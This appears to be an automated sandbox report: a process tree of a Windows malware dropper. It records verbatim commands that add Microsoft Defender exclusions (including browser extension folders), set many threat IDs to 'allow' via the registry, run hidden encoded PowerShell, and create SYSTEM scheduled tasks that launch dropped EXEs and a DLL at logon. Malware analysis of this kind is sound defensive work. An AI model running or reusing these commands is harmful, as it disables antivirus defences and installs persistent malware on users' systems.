C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2388 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2808
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bEcIFlOHxifjjBuFoU" /SC once /ST 17:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\LwcHoZo.exe\" 1V /VRsite_idOvc 385118 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2228
-
-
-
C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\LwcHoZo.exeC:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\LwcHoZo.exe 1V /VRsite_idOvc 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1304 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:3872 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:912
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:1904
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:1560
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:1200
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:3732
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:3736
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:1640
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:4300
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:2180
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:3764
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:4100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:3516
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:2500
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:1260
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:1128
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:2200
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:1820
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:4196
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:4832
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:3640
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:5052
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:1052
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:4904
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:3052
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:3456
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:3328
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:1552
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IgAQuzzvNCUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IgAQuzzvNCUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YrliKKkuhgWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YrliKKkuhgWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\orRvbnhdU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\orRvbnhdU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ycfBUKIjHxeOC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ycfBUKIjHxeOC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\qgjSpVnHOWlNdqVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\qgjSpVnHOWlNdqVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\lwSRcZKonRlOofsg\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\lwSRcZKonRlOofsg\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2272 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR" /t REG_DWORD /d 0 /reg:323⤵PID:1040
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR" /t REG_DWORD /d 0 /reg:324⤵PID:3788
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR" /t REG_DWORD /d 0 /reg:643⤵PID:4884
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IgAQuzzvNCUn" /t REG_DWORD /d 0 /reg:323⤵PID:2036
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IgAQuzzvNCUn" /t REG_DWORD /d 0 /reg:643⤵PID:1056
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrliKKkuhgWU2" /t REG_DWORD /d 0 /reg:323⤵PID:2028
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrliKKkuhgWU2" /t REG_DWORD /d 0 /reg:643⤵PID:4584
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\orRvbnhdU" /t REG_DWORD /d 0 /reg:323⤵PID:4384
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\orRvbnhdU" /t REG_DWORD /d 0 /reg:643⤵PID:2276
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycfBUKIjHxeOC" /t REG_DWORD /d 0 /reg:323⤵PID:652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycfBUKIjHxeOC" /t REG_DWORD /d 0 /reg:643⤵PID:3424
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\qgjSpVnHOWlNdqVB /t REG_DWORD /d 0 /reg:323⤵PID:3220
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\qgjSpVnHOWlNdqVB /t REG_DWORD /d 0 /reg:643⤵PID:3776
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:1916
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:408
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:4104
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:4608
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF /t REG_DWORD /d 0 /reg:323⤵PID:3472
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF /t REG_DWORD /d 0 /reg:643⤵PID:468
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\lwSRcZKonRlOofsg /t REG_DWORD /d 0 /reg:323⤵PID:4064
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\lwSRcZKonRlOofsg /t REG_DWORD /d 0 /reg:643⤵PID:1572
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gSFREmtFc" /SC once /ST 09:28:50 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:2144
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gSFREmtFc"2⤵PID:964
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gSFREmtFc"2⤵PID:2896
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "aUYdFpynDtMaquqaO" /SC once /ST 11:21:52 /RU "SYSTEM" /TR "\"C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe\" F0 /GMsite_idmAX 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2948
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "aUYdFpynDtMaquqaO"2⤵PID:4368
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4728 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:3848
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:2204
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:3048
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3532
-
C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exeC:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\ZBAfLYQ.exe F0 /GMsite_idmAX 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:5100 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bEcIFlOHxifjjBuFoU"2⤵PID:2092
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:2164
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:2284
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:2180
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2008 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4924
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\orRvbnhdU\IyrDVE.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "yozVwwMRZiDXbVH" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3732
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yozVwwMRZiDXbVH2" /F /xml "C:\Program Files (x86)\orRvbnhdU\HJtjZab.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:440
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "yozVwwMRZiDXbVH"2⤵PID:2576
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "yozVwwMRZiDXbVH"2⤵PID:2200
-
-
